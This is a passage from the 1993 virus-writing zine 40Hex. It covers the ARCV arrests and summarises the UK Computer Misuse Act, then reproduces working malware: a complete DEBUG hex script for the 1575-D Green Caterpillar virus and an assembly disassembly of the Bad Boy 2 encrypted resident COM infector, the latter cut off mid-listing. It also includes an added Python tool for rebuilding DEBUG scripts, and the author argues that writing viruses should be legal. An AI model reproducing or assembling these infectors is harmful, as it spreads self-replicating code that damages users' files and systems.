40Hex Number 10 Volume 3 Issue 1
40Hex Issue 10 Volume 3 Number 1 File 004
ARCV Busted!
by DecimatoR
Many of you who read this mag know of the ARCV, and most likely
know Apache Warrior, the president of the group. In December and January,
the ARCV members were raided by Scotland Yard officials, and had their
computer equipment confiscated. Apparently, the bust was triggered not because
of the virus writing they did, but because of the method they allegedly used to
transport their creations to their friends in other countries. A contact in
England recently filled me in on the events which led to the bust of the ARCV.
Apparently, a few of the ARCV members were calling long distance by use of a
beige box (a device which allows tapping into phone lines to make unauthorized
calls) and they got caught. This led to the confiscation of their computer
equipment. The two who were arrested apparently cooperated with the police,
and further examination of the confiscated equipment proved that not only had
the police caught people making fraudulent phone calls, but they also caught
the leaders of a large virus writing group. Further investigation resulted in
more arrests of other ARCV members. Had the group not been phreaking their
calls, chances are they would not be in the fix they are today. Please note,
however, that there have not yet been any trials in the arrests, and the ARCV
members have not been proven guilty.
The following articles were posted on UseNet and tell the story, although all
but one fail to mention that illegal phone calls, and NOT virus writing, were
the key factor in the arrests. Only after the first arrests were made did the
police pursue the avenue concerning virus authorship.
--------------
From "Computing", Feb 4, 1993:
Apache scalps virus cowboys
"Police raided the homes of suspected computer virus authors across
the country last week, arresting five people and seizing equipment.
"The raids were carried out last Wednesday by police in Manchester,
Cumbria, Staffordshire and Devon and Cornwall.
"Scotland Yard's computer crimes unit co-ordinated the raids under the
codename Operation Apache.
" A spokeswoman for the Greater Manchester Police said: 'The
investigation began in the Manchester area following the arrest of the
self-styled president of the virus writing group in Salford last
December.'
"Police would not reveal the man's name, but said he had been released
on bail.
"Last week's raids led to the arrest of a further two people in
Manchester. Three other suspects were also arrested in Staffordshire,
Cumbria and Cornwall.
"PCs and floppy disks were seized in all the raids.
"All those arrested have been released on police bail pending further
investigations."
--------------
From the EFF.TALK newsgroup of Usenet:
"Police have arrested Britain's first computer virus-writing group
in an operation they hope will dampen the aspirations of any potential
high-tech criminals.
Four members of the Association of Really Cruel Viruses (ARCV) were
raided last Wednesday in a joint operation in four cities co-ordinated by
Scotland Yard's computer crimes unit.
The arrests in Greater Manchester, Cumbria, Staffordshire and
Devon and Cornwall, bring to six the members of the group that have been
tracked down by police. Two others, also writing for ARCV, were arrested
a month ago in Manchester.
These six are thought to have written between 30 and 50 relatively
harmless viruses....
--------------
From a reposting of an unidentified newspaper, dated 4 February 1993:
UK Virus Writers Group Foiled by Scotland Yard
British police have arrested four members of a virus-writing group that
calls itself the Association of Really Cruel Viruses (ARCV).
The Scotland Yard Computer Crime Unit coordinated the raids carried out
on suspects in Greater Manchester, Staffordshire, Devon, and Cornwall.
The arrests last Wednesday, January 27, bring to six the number of ARCV
members found by police, after they initially arrested one caught
"phreaking" in Manchester in December. ("Phone phreaking" is the illegal
practice of obtaining free use of telephone lines.) The arrests were
made under Section 3 of the Computer Misuse Act, which prohibits
unauthorized modification of computer material, said Detective Sergeant
Stephen Littler. The suspects, who cannot be identified at this stage
under British law, have been released on bail pending inquiries and may
face further charges.
The members of ARCV used PCs to write viruses, which they shared via a
bulletin board operated by one suspect in Cornwall. The police
confiscated hardware and software, which is being studied by virus
experts to determine how many viruses were written and what the viruses
were intended to do, Littler said. The British anti-virus community
became aware of ARCV through the group's own publicity efforts, such as
a newsletter that it had uploaded to various bulletin boards in the
U.S., according to Richard Ford, editor of the monthly "Virus Bulletin,"
which is published in Abingdon, Oxon, England. The newsletter was
described in detail in the November, 1992, issue of "Virus Bulletin."
"To the best of my knowledge, none of their viruses are in the wild, out
there spreading," said Ford. "But they have been found on virus
exchange bulletin board services, and we've had reports of them being
uploaded rather widely in the UK." ARCV claims, in its newsletter, to
have links with PHALCON/SKISM in the U.S. and other virus writers in
Eastern Europe. "The world is a very small place when you've got a
modem, or are on the Internet," Ford said. The newsletter invites new
members to join even if they are not virus writers but prefer other
"underground" activities such as hacking and phreaking. It also betrays
ARCV's fears of being perceived as nerds (a term not used in Britain)
saying, "Now the picture put out by the Anti- Virus Authors is that
Virus writers are Sad individuals who wear Anoraks and go Train Spotting
but well they are sadly mistaken, we are very intelligent, sound minded,
highly trained, and we wouldn't be seen in an Anorak or near an Anorak
even if dead." (Anorak is the British word for ski jacket.)
ARCV has already failed at one of the objectives mentioned in its
premier newsletter issue, which said, "We will be dodging Special Branch
and New Scotland Yard as we go."
--------------
The following is a summary of Britain's Computer Misuse Act 1990, which
deals with computer crimes:
Summary of Computer Misuse Act 1990:
{ heading }
...
1 -(1) A person is guilty of an offence if-
(a) he causes a computer to perform any function with intent to secure
access to any program or data held in any computer;
(b) the access he intends to secure is unauthorised; and
(c) he knows at the time when he causes the computer to perform the
function that that is the case.
(2) The intent a person has to have to commit an offence under this section
need not be directed at -
(a) any particular program or data;
(b) a program or data of any particular kind; or
(c) a program or data held in any particular computer.
{ up to 6 months prison, or a medium scale - level 5 - fine, or both}
2 {similar - but access with intent to commit or facilitate further offences}
3 -(1) A person is guilty of an offence if-
(a) he does any act which causes an unauthorised modification of the contents
of any computer; and
(b) at the time when he does the act he has the requisite intent and the
requisite knowledge.
(2) For the purposes of subsection (1)(b) above the requisite intent is an
intent to cause a modification of the contents of any computer and by so doing-
(a) to impair the operation of any computer;
(b) to prevent or hinder access to any program or data held in any computer;
(c) to impair the operation of any such program or the reliability of
any such data.
(3) {similar clause on direction of intent to section 1}
(4) For the purposes of subsection (1)(b) above the requisite knowledge
is knowledge that any modification he intends to cause is unauthorised.
(5) It is immaterial for the purposes of this section whether an
unauthorised modification or any intended effect of it of a kind
mentioned in subsection (2) above is, or is intended to be, permanent
or merely temporary.
{ such damage not to be within the terms of the Criminal Damage Act 1971 unless
physical damage is caused }
{ In magistrates court - up to 6 months prison or maximum fine or both}
{ In Crown court up to 5 years prison and/or unlimited fine}
{ sections on Jurisdiction - Act applies as long as there is a significant
UK connection - either accused or target computer was in UK}
{ lots of further legal details - no way am I typing in all that!}
14. { search warrant to be issued by a judge, not just a magistrate}
15. { Extradition attempts possible for offences under sections 2 or 3,
conspiracy to commit such, or attempt to commit section 3 offence}
{ more verbiage}
17. {lots of definitions - Computer is _not_ formally defined anywhere
in English Law}
{Definition of Access - seems to cover anything you could think of
doing with a computer}
{definitions of unauthorised - again rather wide}
{ ... }
(10) References to a program include references to part of a program.
--------------
There ya have it. I personally would like to wish Apache Warrior, Ice-9,
and the rest of ARCV luck in the upcoming legal mess they face. I was sorry
to hear about the bust of the group, but even sorrier when I found out that
some of the members were arrested solely because they had a hand in virus
production. When you commit fraud, you are breaking the law, and yes, you
should be held accountable for your actions. I tend to have the opposite
point of view when it comes to authoring a virus, however. Simply writing code
should never be illegal. Spreading, yes, but writing? No. Unfortunately, the
"powers that be" don't always see it as I do.
--DecimatoR
40Hex Issue 10 Volume 3 Number 1 File 005
This is the 1575-D, or Green Caterpillar virus. This resident COM and EXE
infector is so named for the little green caterpillar which will occasionally
crawl across the screen and eat up characters as it goes along. It is
otherwise unremarkable.
-------------------------------------------------------------------------------
n 1575-d.com
e 0100 0E 8C C8 05 3F 00 50 B8 00 01 50 CB 00 00 00 00
e 0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04E0 00 00 00 00 00 00 00 00 8B 07 2E FF 36 F8 07 2E
e 04F0 EB 4A 90 60 14 34 02 53 FF 00 F0 CD 20 00 00 00
e 0500 00 00 00 00 00 00 00 7E A4 0A 03 00 01 00 00 00
e 0510 01 0A 03 00 00 9C 0E 00 00 60 36 05 00 AA 43 B5
e 0520 9A 97 03 00 40 89 0E B4 0D 7A 04 71 EA 56 34 02
e 0530 00 00 00 00 78 F8 00 F0 5C 07 70 00 06 1E 8C C0
e 0540 0E 1F 0E 07 A3 35 01 8C D0 A3 2B 01 B0 02 E6 20
e 0550 FC 33 C0 8E D8 33 F6 BF 3C 01 B9 10 00 F2 A4 1E
e 0560 17 BD 08 00 87 EC E8 4C 00 E9 C6 03 E8 5D 04 E8
e 0570 AB 00 74 0E A0 24 07 50 E8 13 01 58 A2 24 07 EB
e 0580 13 90 E8 76 02 E8 95 02 80 3E 24 07 00 75 05 B8
e 0590 00 4C CD 21 80 3E 24 07 43 75 31 1F 07 0E 1F 07
e 05A0 06 BF 00 01 BE 0B 01 B9 0C 00 F2 A4 06 1F B8 00
e 05B0 01 50 33 C0 CB BE 06 00 AD 3D 92 01 74 DD 3D 79
e 05C0 01 75 03 E9 A9 00 3D DC 01 74 01 C3 1F 07 2E 8B
e 05D0 1E 19 01 2E 2B 1E 31 01 8C C8 2B C3 8E D0 2E 8B
e 05E0 2E 33 01 87 EC 2E 8B 1E 21 01 2E 2B 1E 23 01 8C
e 05F0 C8 2B C3 50 2E A1 25 01 50 CB 23 1A 3C 23 2F 2D
e 0600 2D 21 2E 24 0E 23 2F 2D E0 41 3A 31 35 37 35 2D
e 0610 44 2E 43 4F 4D 00 00 00 24 24 24 24 24 B8 02 3D
e 0620 BA 19 02 CD 21 73 02 F8 C3 A3 2B 01 BA 73 06 B8
e 0630 24 25 CD 21 B8 02 42 8B 1E 2B 01 B9 FF FF BA FE
e 0640 FF CD 21 BA 7D 02 B4 3F 8B 1E 2B 01 B9 02 00 CD
e 0650 21 B4 3E CD 21 1E 8B 16 39 01 A1 37 01 8E D8 B8
e 0660 24 25 CD 21 1F 81 3E 7D 02 0C 0A F8 C3 00 00 3D
e 0670 2D 02 74 1A 1E 07 0E 1F A1 2B 01 8E D0 87 EC BE
e 0680 3C 01 BF 00 00 B9 10 00 FC F2 A4 E9 DE FE B0 43
e 0690 A2 24 07 B0 08 E6 70 E4 71 A2 3B 01 BA 19 02 B8
e 06A0 02 3D CD 21 73 01 C3 A3 2B 01 BA 0B 01 8B 1E 2B
e 06B0 01 B9 0C 00 B4 3F CD 21 B8 02 42 33 C9 33 D2 CD
e 06C0 21 50 05 10 00 25 F0 FF 50 D1 E8 D1 E8 D1 E8 D1
e 06D0 E8 BF 1F 03 AB 58 5B 2B C3 B9 27 06 03 C8 BA 00
e 06E0 01 2B D0 8B 1E 2B 01 B4 40 CD 21 B8 00 42 33 C9
e 06F0 33 D2 CD 21 B4 40 8B 1E 2B 01 B9 0C 00 BA 1B 03
e 0700 CD 21 B4 3E 8B 1E 2B 01 CD 21 C3 0E 8C C8 05 3F
e 0710 00 50 B8 00 01 50 CB B0 45 A2 24 07 B0 08 E6 70
e 0720 E4 71 A2 3B 01 BA 19 02 B8 02 3D CD 21 73 01 C3
e 0730 A3 2B 01 BA 0B 01 8B 1E 2B 01 B9 18 00 B4 3F CD
e 0740 21 B8 02 42 B9 00 00 BA 00 00 CD 21 50 05 10 00
e 0750 83 D2 00 25 F0 FF 89 16 27 01 A3 29 01 B9 27 07
e 0760 81 E9 00 01 03 C1 83 D2 00 B9 00 02 F7 F1 40 A3
e 0770 0F 01 89 16 0D 01 A1 21 01 A3 23 01 A1 1F 01 A3
e 0780 25 01 A1 19 01 A3 31 01 A1 1B 01 A3 33 01 8B 16
e 0790 27 01 A1 29 01 B9 10 00 F7 F1 2D 10 00 2B 06 13
e 07A0 01 A3 21 01 A3 19 01 C7 06 1F 01 00 01 C7 06 1B
e 07B0 01 00 01 B8 00 42 33 C9 BA 02 00 CD 21 BA 0D 01
e 07C0 8B 1E 2B 01 B9 16 00 B4 40 CD 21 B8 02 42 33 C9
e 07D0 33 D2 CD 21 BA 00 01 A1 29 01 59 2B C1 2B D0 B9
e 07E0 27 07 03 C8 81 E9 00 01 B4 40 CD 21 B4 3E CD 21
e 07F0 C3 51 B9 00 00 B4 4E CD 21 59 C3 06 B8 1C 35 CD
e 0800 21 2E 89 1E 07 01 2E 8C 06 09 01 B8 21 35 CD 21
e 0810 06 58 2E A3 05 01 2E 89 1E 03 01 07 C3 50 06 1E
e 0820 33 C0 8E C0 BE 86 00 26 8B 04 8E D8 BE 25 07 81
e 0830 3C 0C 0A 75 09 1E 58 E8 B7 01 1F 07 58 C3 0E 1F
e 0840 A1 35 01 48 8E C0 26 80 3E 00 00 5A 74 03 EB 44
e 0850 90 26 A1 03 00 B9 37 07 D1 E9 D1 E9 D1 E9 D1 E9
e 0860 2B C1 72 30 26 A3 03 00 26 29 0E 12 00 0E 1F 26
e 0870 A1 12 00 50 07 BE 00 01 56 5F B9 27 06 FC F2 A4
e 0880 06 2B C0 8E C0 BE 84 00 BA A8 04 26 89 14 46 46
e 0890 58 26 89 04 1F 07 58 C3 3C 57 75 03 EB 1E 90 80
e 08A0 FC 1A 75 06 E8 17 01 EB 13 90 80 FC 11 75 04 E8
e 08B0 0F 00 CF 80 FC 12 75 04 E8 C1 00 CF 2E FF 2E 03
e 08C0 01 B0 57 CD 21 50 51 52 53 55 56 57 1E 06 0E 1F
e 08D0 0E 07 2E C6 06 CD 05 00 90 E8 18 00 75 0C E8 3C
e 08E0 FD 74 07 E8 54 01 FE 0E CD 05 07 1F 5F 5E 5D 5B
e 08F0 5A 59 58 C3 0E 07 0E 07 FC E8 36 00 73 04 83 FF
e 0900 00 C3 BF 19 02 B0 2E B9 0B 00 F2 AE 81 3D 43 4F
e 0910 75 0D 80 7D 02 4D 75 07 C6 06 24 07 43 90 C3 81
e 0920 3D 45 58 75 0C 80 7D 02 45 75 06 C6 06 24 07 45
e 0930 90 C3 1E 2E 8B 36 2D 01 2E A1 2F 01 8E D8 BF 19
e 0940 02 AC 3C FF 75 07 83 C6 06 AC EB 08 90 3C 05 72
e 0950 03 1F F9 C3 B9 0B 00 3C 00 74 06 04 40 AA B0 3A
e 0960 AA AC 3C 20 74 04 AA EB 0B 90 26 80 7D FF 2E 74
e 0970 03 B0 2E AA E2 EB B0 00 AA 1F F8 C3 B0 57 CD 21
e 0980 50 51 52 53 55 56 57 1E 06 0E 1F 0E 07 2E 80 3E
e 0990 CD 05 00 74 03 EB 1C 90 E8 59 FF 75 16 E8 7D FC
e 09A0 74 11 E8 95 00 FE 0E CD 05 07 1F 5F 5E 5D 5B 5A
e 09B0 59 58 C3 07 1F 5F 5E 5D 5B 5A 59 58 C3 00 50 1E
e 09C0 58 2E A3 2F 01 2E 89 16 2D 01 58 C3 0E B0 00 E6
e 09D0 20 B8 24 35 CD 21 89 1E 39 01 8C C3 89 1E 37 01
e 09E0 07 BE 0A 02 BF 19 02 B9 0F 00 AC 04 20 AA E2 FA
e 09F0 C3 50 0E 1F 0E 07 8A 1E 3B 01 80 FB 0C 77 39 80
e 0A00 FB 00 74 34 B0 08 E6 70 E4 71 3C 0C 77 2A 3C 00
e 0A10 74 26 3A C3 74 22 FE C3 E8 14 00 3A C3 74 19 FE
e 0A20 C3 E8 0B 00 3A C3 74 10 1F E8 3A 00 0E 1F C3 80
e 0A30 FB 0C 76 03 80 EB 0C C3 58 C3 BA 73 06 B8 24 25
e 0A40 CD 21 80 3E 24 07 43 75 06 E8 42 FC EB 04 90 E8
e 0A50 C5 FC 1E 8B 16 39 01 A1 37 01 8E D8 B8 24 25 CD
e 0A60 21 1F C3 B0 03 CF BA B0 06 B8 1C 25 CD 21 C6 06
e 0A70 B0 06 90 90 B8 00 B8 8E C0 BF A0 0F B8 20 07 B9
e 0A80 0B 00 F2 AB 0E 07 C3 00 00 00 20 07 0F 0A 0F 0A
e 0A90 0F 0A 0F 0A 0F 0A 0F 0A 0F 0A 0F 0A F7 0E EE 0C
e 0AA0 90 FB 50 51 52 53 55 56 57 1E 06 0E 1F EB 0B 90
e 0AB0 07 1F 5F 5E 5D 5B 5A 59 58 CF B8 00 B8 8E C0 E8
e 0AC0 2B 00 BE 9A 06 B9 16 00 F2 A4 80 3E AE 06 EE 74
e 0AD0 08 C6 06 AE 06 EE EB 06 90 C6 06 AE 06 F0 26 8B
e 0AE0 05 B4 0E A3 9A 06 C6 06 99 06 00 EB C3 BF 00 00
e 0AF0 BE 9C 06 57 B9 12 00 FC F3 A6 5F 74 0B 47 47 81
e 0B00 FF A0 0F 75 EB BF 00 00 81 FF 9E 0F 75 05 C6 06
e 0B10 B0 06 CF C3 43 0C 0A
rcx
0A17
w
q
-------------------------------------------------------------------------------
DA
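The script above is in the format DOS DEBUG reads from standard input: `n` names the output file, each `e` line enters bytes at an offset in the code segment (a .COM image sits at 100h), `rcx` followed by a hex value loads CX with the byte count, and `w` writes CX bytes starting at offset 100h. Analysts still run into this format inside droppers and batch-file payloads, so a converter that rebuilds the image and checks that the declared length agrees with the bytes actually entered is a handy check. The code below is an added example, not part of the 40Hex listing; it handles only the command subset used above (`n`, `e` with hex bytes, `rcx`, `w`, `q`; quoted-string operands to `e` are not supported) and ships with a small constructed sample script rather than the 1575-D dump.

```python
import re
from dataclasses import dataclass

# DEBUG writes CX bytes starting at CS:0100h when 'w' is issued for a .COM
# image, so addresses in the script are taken relative to LOAD_BASE.
LOAD_BASE = 0x100

# "e 0100 0E 8C C8 ..." : address, then one or more hex byte pairs
_E_LINE = re.compile(r"^[eE]\s+([0-9A-Fa-f]{1,4})((?:\s+[0-9A-Fa-f]{2})+)\s*$")


@dataclass
class DebugImage:
    name: str        # file name from the 'n' command (None if absent)
    data: bytes      # the CX bytes DEBUG would write
    declared: int    # value given after 'rcx'
    entered: int     # bytes covered by 'e' lines, from LOAD_BASE to the last one


def parse_debug_script(text: str) -> DebugImage:
    """Rebuild the file a DEBUG script would write with 'w'.

    Bytes inside the first CX that no 'e' line set are filled with zero, which
    is what a fresh DEBUG session usually holds but is not guaranteed; compare
    'declared' with 'entered' to spot that case.
    """
    image = bytearray()
    name = None
    declared = None
    lines = iter(text.splitlines())
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line[:1].lower() == "n" and line[1:2].isspace():
            name = line[1:].strip()
            continue
        m = _E_LINE.match(line)
        if m:
            off = int(m.group(1), 16) - LOAD_BASE
            if off < 0:
                raise ValueError(f"address below load base: {line}")
            chunk = bytes.fromhex(m.group(2))   # fromhex ignores the spaces
            end = off + len(chunk)
            if end > len(image):
                image.extend(b"\0" * (end - len(image)))
            image[off:end] = chunk
            continue
        if line.lower() == "rcx":
            value = next(lines, "").strip()     # the count is on the next line
            if not value:
                raise ValueError("rcx without a value")
            declared = int(value, 16)
            continue
        if line.lower() in ("w", "q"):
            continue
        raise ValueError(f"unsupported DEBUG command: {line}")
    if declared is None:
        raise ValueError("script sets no length (no 'rcx')")
    entered = len(image)
    if entered < declared:
        image.extend(b"\0" * (declared - entered))
    return DebugImage(name, bytes(image[:declared]), declared, entered)


# Constructed sample (not from the zine): a 14-byte .COM that prints "Hi".
SAMPLE_SCRIPT = """\
n sample.com
e 0100 B4 09 BA 0B 01 CD 21 B4 4C CD 21
e 010B 48 69 24
rcx
000E
w
q
"""

if __name__ == "__main__":
    img = parse_debug_script(SAMPLE_SCRIPT)
    print(img.name, hex(img.declared), hex(img.entered), img.data.hex())
```

For the 1575-D script above, the last `e` line starts at 0B10h and carries 7 bytes, so the entered length is 0B17h - 0100h = 0A17h, which agrees with its `rcx` value; a mismatch in either direction is the first thing to look at when a reconstructed dropper does not behave as the accompanying text claims.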
40Hex Issue 10 Volume 3 Number 1 File 006
The following is the Bad Boy 2 virus. Patricia M. Hoffman's VSUM is clearly
not a good source of virus description, so we will not bother including its
utterly useless description of the virus here. Bad Boy 2 is a resident COM
infector. After 10 infections, it turns itself off by putting the original
int 21h vector back. Although most of the code is written well, there are
still a few bugs and inconsistencies in it. It implements several well-known
stealth techniques, including playing with the system file table: the file is
opened read-only, the SFT entry's open mode is then flipped to read/write and
its file position is set directly, and the file's time and date are restored
afterwards. It also swaps DOS's internal disk handler into the int 13h vector
around the write to get past disk monitors. It is a segmented virus, with
variable placement of each of its eight code segments when it infects a file,
and it XOR-encrypts them. Thus the locations of the segments relative to each
other change upon each infection; only the 12-byte entry stub and the data
area at 100h stay fixed.
For a byte-to-byte match up of the original, assemble with the following:
tasm badboy2.asm
tlink /t badboy2
Note only one pass is required.
Dark Angel
Phalcon/Skism 1993
-------------------------------------------------------------------------------
.model tiny
.code
org 100h
; Bad Boy 2 virus
; Disassembly done by Dark Angel of Phalcon/Skism
; For 40Hex Issue 10 Volume 3 Number 1
start:
push cs:startviruspointer ; save on stack for
push cs ; return
pop ds
jmp word ptr cs:encryptpointer ; decrypt virus
endstart:
curpointer dw 0
infcounter db 0
filesize dw 2
filetime dw 0
filedate dw 0
origint21 dw 0, 0
DOSdiskOFF dw 0
DOSdiskSEG dw 0
oldint21 dw 0, 0
oldint24 dw 0, 0
; The parts of the virus are here
encryptpointer dw offset carrierencrypt
startviruspointer dw offset startvirus
installpointer dw offset install
exitviruspointer dw offset exitvirus
restoreint21pointer dw offset restoreint21
int24pointer dw offset int24
int21pointer dw offset int21
infectpointer dw offset infect
encryptlength dw endencrypt-encrypt
startviruslength dw endstartvirus-startvirus
installlength dw endinstall-install
exitviruslength dw endexitvirus-exitvirus
restoreint21length dw endrestoreint21-restoreint21
int24length dw endint24-int24
int21length dw endint21-int21
infectlength dw endinfect-infect
enddata:
encrypt: ; and decrypt
mov bx,offset startviruspointer
mov cx,6
do_next_segment:
cmp bx,offset int24pointer
jne not_int24pointer
add bx,2
not_int24pointer:
push bx
push cx
mov ax,[bx] ; get start offset
mov cx,[bx+encryptlength-encryptpointer] ; and length
mov bx,ax
encrypt_segment:
xor [bx],al ; encrypt cx bytes
inc bx
loop encrypt_segment
pop cx
pop bx
add bx,2 ; go to next segment
loop do_next_segment
retn
endencrypt:
startvirus:
mov es,cs:[2] ; get top of memory
mov di,100h ; check if virus
mov si,100h ; already resident
mov cx,offset endstart - offset start - 1
rep cmpsb
jnz not_installed ; continue if not
jmp cs:exitviruspointer ; otherwise, quit
not_installed:
mov ax,cs ; get current program's
dec ax ; MCB
mov ds,ax
cmp byte ptr ds:[0],'Z' ; check if last one
;nop
je is_last_MCB ; continue if so
jmp cs:exitviruspointer ; otherwise, quit
is_last_MCB:
rsize = ((endvirus - start + 15)/16+1)*3 ; resident size in
; paragraphs
sub word ptr ds:[3],rsize ; decrease MCB's memory
mov ax,es ; get segment of high memory
sub ax,rsize ; decrease by virus size
mov es,ax ; es = start segment of virus
mov ds:[12h],ax ; put value in PSP top of
; memory field
push cs
pop ds
mov cs:infcounter,0 ; clear infection counter
mov di,100h
mov cx,offset enddata - offset start
mov si,100h
rep movsb
mov bx,cs:encryptpointer
add bx,encrypt_segment-encrypt+1
xor byte ptr [bx],18h ; change to: xor [bx],bl
; shuffling segments to different locations
mov cx,8
mov curpointer,offset encrypt
shuffle:
push cx
call random_segment
push bx
mov ax,[bx]
push ax
add bx,encryptlength-encryptpointer
mov cx,[bx]
pop si
pop bx
xchg di,curpointer
mov es:[bx],di ; copy segment
rep movsb ; to memory area
xchg di,curpointer
mov ax,8000h
or [bx],ax ; mark already copied
pop cx
loop shuffle
mov cl,8
not ax ; ax = 7FFFh
mov bx,offset encryptpointer
clear_hibit: ; restore the pointers
and [bx],ax
add bx,2
loop clear_hibit
jmp cs:installpointer
random_segment:
push cx
push es
xor cx,cx
mov es,cx
random_segment_loop:
mov bx,es:[46Ch] ; get timer ticks since
; midnight MOD 8
db 081h,0e3h,7,0 ; and bx,7
shl bx,1 ; multiply by 2
add bx,offset encryptpointer
test word ptr [bx],8000h ; check if already moved
jnz random_segment_loop ; do it again if so
pop es
pop cx
retn
endstartvirus:
install:
xor ax,ax
mov ds,ax ; ds->interrupt table
mov ax,ds:21h*4 ; save old int 21h handler
mov es:oldint21,ax
mov ax,ds:21h*4+2
mov word ptr es:oldint21+2,ax
mov ah,30h ; get DOS version
int 21h
cmp ax,1E03h ; DOS 3.30? (AL=major, AH=minor)
jne not_DOS_3X ; skip if not
mov es:origint21,1460h ; use known value for int 21h
mov ax,1203h ; get DOS segment
push ds
int 2Fh
mov word ptr es:origint21+2,ds
pop ds
jmp short is_DOS_3X
nop
not_DOS_3X:
mov ax,ds:21h*4
mov es:origint21,ax
mov ax,ds:21h*4+2
mov word ptr es:origint21+2,ax
is_DOS_3X:
cli ; set new int 21h handler
mov ax,es:int21pointer
mov ds:21h*4,ax
mov ax,es
mov ds:21h*4+2,ax
sti
mov cx,es
mov ah,13h ; get DOS's internal disk handler
int 2Fh ; (returned in ds:dx; es:bx = int 13h)
push es
mov es,cx
mov es:DOSdiskOFF,dx
mov es:DOSdiskSEG,ds
pop es
int 2Fh ; restore DOS disk handler
jmp cs:exitviruspointer
endinstall:
exitvirus:
push cs ; copy return routine to
push cs ; buffer at end of file
pop ds ; and transfer control
pop es ; to it
mov si,cs:exitviruspointer
add si,offset return_to_COM - offset exitvirus
;nop
mov di,cs:filesize
add di,offset endvirus
push di
mov cx,offset end_return_to_COM - offset return_to_COM
cld
rep movsb
retn ; jmp to return_to_COM
return_to_COM:
mov si,cs:filesize
add si,100h
cmp si,offset endvirus ; check if small file
jae not_negative ; if not, skip next
mov si,offset endvirus ; adjust for too small
not_negative:
mov di,100h
mov cx,offset endvirus - offset start - 1 ; ????
rep movsb ; copy old file to start
mov ax,100h ; and exit the virus
push ax
retn
end_return_to_COM:
endexitvirus:
restoreint21:
xor di,di
mov ds,di
cli
mov di,cs:oldint21
mov ds:21h*4,di
mov di,word ptr cs:oldint21+2
mov ds:21h*4+2,di
sti
retn
plea db 'Make me better!'
endrestoreint21:
int24:
mov al,3
iret
message db 'The Bad Boy virus, Version 2.0, Copyright (C) 1991.',0
endint24:
int21:
push bx
push si
push di
push es
push ax
cmp ax,4B00h ; check if execute
